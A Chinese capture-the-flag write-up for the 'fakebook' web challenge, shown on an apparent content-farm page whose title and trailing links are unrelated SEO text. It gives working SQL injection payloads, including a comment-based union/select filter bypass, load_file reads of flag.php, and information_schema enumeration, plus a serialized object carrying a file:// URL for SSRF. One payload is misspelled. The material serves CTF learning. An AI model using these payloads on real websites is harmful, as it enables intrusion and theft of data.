当前位置: 首页 > news >正文

查询网站备案查询深圳宝安区网站建设

查询网站备案查询,深圳宝安区网站建设,工商注册公司流程,免费建自己域名的网站1.打开题目先用dirsearch工具扫描一波,扫出来了robots.php目录,然后访问robots.txt 目录,发现了有一个备份文件 ,访问备份文件,下载内容 文件的大致内容如下 里面有一个curl_exec这个函数容易造成ssrf攻击的漏洞 我…

1.打开题目先用dirsearch工具扫描一波,扫出来了robots.php目录,然后访问robots.txt

目录,发现了有一个备份文件 ,访问备份文件,下载内容

文件的大致内容如下

里面有一个curl_exec这个函数容易造成ssrf攻击的漏洞

我们回到首页先去注册一个账号

然后登陆进去了,点击一下admin这个用户,发现url上有可以注入的点,那么我们尝试使用sql语句来判断,输入?no=1 and 1=1 的时候回显正常,输入?no=1=2的时候回显报错,明显是数字类型的注入

我们先来判断有多少列

?no=1 order by 1#   //正常
?no=1 order by 2#   //正常
?no=1 order by 3#    //正常
?no=1 order by 4#   //正常
?no=1 order by 5#   //错误

通过测试发现有4列

我们进行联合注入测试使用命令1' union select 1,2,3,4#结果发现这句话被过滤了

那么我们测试一下是过滤了什么,通过测试发现过滤了union和select那么我们使用注释绕过语句为-1 union/**/select 1,2,3,4--+测试回显位在哪里,-1是不存在的,给一个不存在的才可以看到占位符,从这个回显图上可以看到username的位置有回显,这个就是第二列的参数,就是-1 union/**/select 1,2,3,4#中数字2的参数回显,这就是回显位,那么从这里注入

构造payload语句为-1 union/**/select 1,database(),3,4#查看数据库名,可以看到数据库名字为fakebook

接下来我们来查看数据库信息使用payload:-1 union/**/select 1,user(),3,4#,可以知道用户是root用户的权限,知道了是root权限之后可以使用函数load_file()来利用绝对路径加载文件,可以构造的payload为-1 union/**/select 1,load_file("/var/www/html/flag.php"),3,4#来查看flag,网页直接回显了flag

另一种获取的 方法是-1 union/**/select 1,group_concat(table_name),3,4 from informaion_schema.tables where table_schema='fakebook'#来查看表名,然后通过表名来查看列名字

构造的payload为-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'# 从下图可以看出no是第一列的,username是第二列的,passwd是第三列的data是第四列

然后在data里看到了一个序列化的字符串?no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:19;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'然后源码里的base64加密,解密之后就是flag了

http://www.yayakq.cn/news/454993/

相关文章:

  • 葫芦岛建设工程信息网站开发一款app需要多少钱?
  • 黑龙省建设厅网站wordpress关闭功能
  • 网站制作 北京网站建设公司天晴创艺网站建设百度小程序
  • 俄语淘宝网站建设品牌建设的概念
  • 推销什么企业做网站和app6湖北好的快速排名系统
  • 厦门网站建设求职简历优质的杭州网站优化
  • 网站的首页标题在哪里设置的江苏省建设工人考勤网站
  • 北京住房投资建设中心网站首东莞阳光网官方网站登录
  • 网站源码如何使用wordpress文章怎么消失
  • 长沙wap网站建设办公室装修方案
  • 做英文网站地图四川中天建设有限公司网站
  • 兰州网站建设与优化推广wordpress 图片说明
  • 零陵网站建设wap网站在线生成app
  • 罗湖商城网站设计企业建站需要多少钱
  • 医院类网站建设与维护前端优化
  • 平台类网站做多久网站谁做的比较好看
  • 微站官网h5游戏大全在线玩
  • 爱站网反链查询怎样看一个网站是不是织梦做的
  • 如何优化基础建站免费服务器使用推荐
  • 网站建设找超速云网页与网站设计说明
  • 帮企业建设网站销售app开发技术有哪些
  • 网站建设配置文件无法粘贴高端网站建设网站定制
  • 网站开发项目经验和教训阿里巴巴国际站跨境电商平台
  • php租车网站源码网站如何有排名
  • 山东国舜建设集团网站做一个微信小程序商城需要多少钱
  • 电子商务网站建设特色做设计去哪些网站下载素材
  • 免费域名网站黄的免费成都网站开发哪家好
  • 网站内页怎么做seo注册公司多少钱起步
  • 建材手机网站网站建设制作报价方案
  • 服务号微网站怎么做的湛江网站建设制作价格